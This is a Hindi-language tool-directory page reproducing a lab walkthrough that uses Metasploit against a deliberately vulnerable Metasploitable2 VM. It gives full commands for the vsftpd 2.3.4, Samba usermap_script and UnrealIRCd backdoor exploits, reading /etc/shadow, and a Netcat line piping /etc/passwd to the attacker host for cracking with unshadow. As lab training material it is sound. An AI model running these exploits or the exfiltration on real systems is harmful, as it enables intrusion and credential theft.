Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
metasploitable2-exploitation-metasploit — Metasploitable2 के विरुद्ध पूर्ण Metasploit शोषण वॉकथ्रू — vsftpd बैकडोर, Samba CVE-2007-2447, UnrealIRCd बैकडोर, Netcat डेटा निकासी, और क्रेडेंशियल क्रैकिंग की तैयारी। | Kitploit
उपकरण/GitHubGitHub/ethicalhackinglabs/metasploitable2-exploitation-metasploit
पासवर्ड क्रैकिंगटोहीशोषण फ्रेमवर्कनेटवर्क मैपिंगभेद्यता विश्लेषणशोषणडेटा निष्कासनपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
लर्निंग और शिक्षा
पेलोड डेवलपमेंट
लैब और अभ्यास
GitHubethicalhackinglabs/metasploitable2-exploitation-metasploit

metasploitable2-exploitation-metasploit

Metasploitable2 के विरुद्ध पूर्ण Metasploit शोषण वॉकथ्रू — vsftpd बैकडोर, Samba CVE-2007-2447, UnrealIRCd बैकडोर, Netcat डेटा निकासी, और क्रेडेंशियल क्रैकिंग की तैयारी।

रिपॉजिटरी देखें
223 महीने पहलेअभी तक समीक्षित नहीं

Metasploit के साथ Metasploitable2 का शोषण: VSFTPD, Samba, और अधिक

Metasploit Framework का उपयोग करके शोषण का एक व्यावहारिक वॉकथ्रू — PostgreSQL डेटाबेस सेटअप और db_nmap स्कैनिंग से, vsftpd, Samba, और UnrealIRCd के माध्यम से तीन रूट शेल तक, Netcat के साथ क्रेडेंशियल एक्सफिल्ट्रेशन तक।


अवलोकन

यह रिपॉजिटरी एक पृथक VirtualBox लैब में Metasploitable2 के विरुद्ध एक पूर्ण Metasploit एंगेजमेंट का दस्तावेजीकरण करती है। शामिल विषय:

  • PostgreSQL बैकएंड और वर्कस्पेस के साथ Metasploit सेट करना
  • स्कैन परिणामों को सीधे डेटाबेस में सहेजने के लिए db_nmap चलाना
  • vsftpd 2.3.4 बैकडोर का शोषण (सप्लाई-चेन समझौता)
  • Samba CVE-2007-2447 का शोषण (usermap_script कमांड इंजेक्शन)
  • Netcat के माध्यम से /etc/passwd और /etc/shadow को एक्सफिल्ट्रेट करना और unshadow के साथ मर्ज करना
  • UnrealIRCd 3.2.8.1 बैकडोर का शोषण

लैब वातावरण

मशीनभूमिकाIP पता
Kali Linux 2026.1हमलावर192.168.1.4
Metasploitable2लक्ष्य192.168.1.3

नेटवर्क: 192.168.1.0/24 — VirtualBox के अंदर पूरी तरह से पृथक NAT नेटवर्क।


चरण 1 — Metasploit सेटअप और डेटाबेस-समर्थित स्कैन

# PostgreSQL प्रारंभ करें और डेटाबेस इनिशियलाइज़ करें (केवल एक बार)
sudo systemctl start postgresql
sudo msfdb init

# Metasploit लॉन्च करें
msfconsole

Kali और Metasploitable2 चल रहे हैं

Kali अपडेट और PostgreSQL प्रारंभ

msf6> db_status           # सत्यापित करें: msf से कनेक्टेड। कनेक्शन प्रकार: postgresql।
msf6> workspace -a 178-metasploitable2
msf6> workspace           # सक्रिय वर्कस्पेस की पुष्टि करें

db_status और workspace आउटपुट

msf6> db_nmap -A 192.168.1.0/24 -n

db_nmap स्कैन प्रगति पर

msf6> hosts
msf6> services

hosts और services आउटपुट

Metasploitable2 पर दो FTP सर्वर मिले:

पोर्टसेवाजानकारी
21/tcpftpvsftpd 2.3.4
2121/tcpftpProFTPD 1.3.1

चरण 2 — vsftpd 2.3.4 का शोषण (बैकडोर)

जुलाई 2011 में, vsftpd 2.3.4 स्रोत संग्रह से समझौता किया गया था — एक बैकडोर डाला गया था जो FTP उपयोगकर्ता नाम में :) होने पर पोर्ट 6200 पर एक रूट शेल खोलता है। CVE: CVE-2011-2523। कोड डिफ: https://pastebin.com/AetT9sS5

msf6> search type:exploit name:vsftpd
# परिणाम: exploit/unix/ftp/vsftpd_234_backdoor  (रैंक: उत्कृष्ट)

msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> info

vsftpd शोषण जानकारी - भाग 1

vsftpd शोषण जानकारी - भाग 2

vsftpd विकल्प दिखाएँ

vsftpd RHOSTS RPORT LHOST सेट करना

msf6> set RHOSTS 192.168.1.3
msf6> set RPORT 21
msf6> set LHOST 192.168.1.4
msf6> exploit

vsftpd शोषण निष्पादन और Meterpreter सत्र

रिमोट रूट फाइलसिस्टम पर ls

meterpreter> shell
whoami          # रूट
uname -a        # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

whoami रूट और uname -a आउटपुट

हैशेड पासवर्ड निकालें:

cat /etc/shadow | grep '$1'

shadow फ़ाइल हैशेड पासवर्ड


चरण 3 — Samba CVE-2007-2447 का शोषण

Samba संस्करण 3.0.0–3.0.25rc3 उपयोगकर्ता नाम फ़ील्ड में शेल मेटा-कैरेक्टर को username map script विकल्प के माध्यम से सीधे /bin/sh तक पहुंचाते हैं — प्रमाणीकरण होने से पहले। Metasploitable2 Samba 3.0.20-Debian चलाता है।

msf6> search type:exploit name:samba
# ~7 शोषण मिले

msf6> use exploit/multi/samba/usermap_script
msf6> info

खोज से Samba शोषण सूची

Samba usermap_script जानकारी

Samba CVE विवरण और संदर्भ

msf6> set RHOSTS 192.168.1.3
msf6> exploit

Samba शोषण निष्पादन - सत्र खोला गया

Samba शेल पर whoami रूट और smbd --version

whoami          # रूट
smbd --version  # संस्करण 3.0.20-Debian

Netcat फ़ाइल एक्सफिल्ट्रेशन

टैब 2 — Kali (प्राप्त कर रहा है):

nc -l -p 4567 > passwd.txt

टैब 1 — शोषण शेल (भेज रहा है):

cat /etc/passwd | nc 192.168.1.4 4567

Kali पर Netcat लिसनर passwd प्राप्त कर रहा है

एक्सफिल्ट्रेशन के बाद passwd.txt सामग्री

/etc/shadow के लिए दोहराएं, फिर मर्ज करें:

unshadow passwd.txt shadow.txt > metasploitable_logins.txt
cat metasploitable_logins.txt

चरण 4 — UnrealIRCd 3.2.8.1 का शोषण (बैकडोर)

UnrealIRCd 3.2.8.1 को इसके स्रोत कोड में एक बैकडोर के साथ वितरित किया गया था। पोर्ट 6667 पर AB भेजने से सर्वर किसी भी बाद के कमांड को रूट के रूप में निष्पादित कर देता है — कोई प्रमाणीकरण आवश्यक नहीं।

msf6> use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6> set payload cmd/unix/bind_netcat
msf6> set RHOSTS 192.168.1.3
msf6> set LHOST 192.168.1.4
msf6> set RPORT 6667
msf6> exploit

UnrealIRCd शोषण विकल्प और निष्पादन

UnrealIRCd रूट शेल - whoami और uname -a

whoami   # रूट
uname -a # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

आवश्यक विकल्प:

विकल्पमानविवरण
RHOSTS192.168.1.3लक्ष्य IP
RPORT6667IRC डिफ़ॉल्ट पोर्ट
LHOST192.168.1.4Kali लिसनर IP
payloadcmd/unix/bind_netcatNetcat के माध्यम से बाइंड शेल

एक नज़र में Metasploit वर्कफ़्लो

db_nmap → hosts → services → search → use → info → show options → set → exploit → shell

सामान्य गलतियाँ

टूल डाउनलोड करें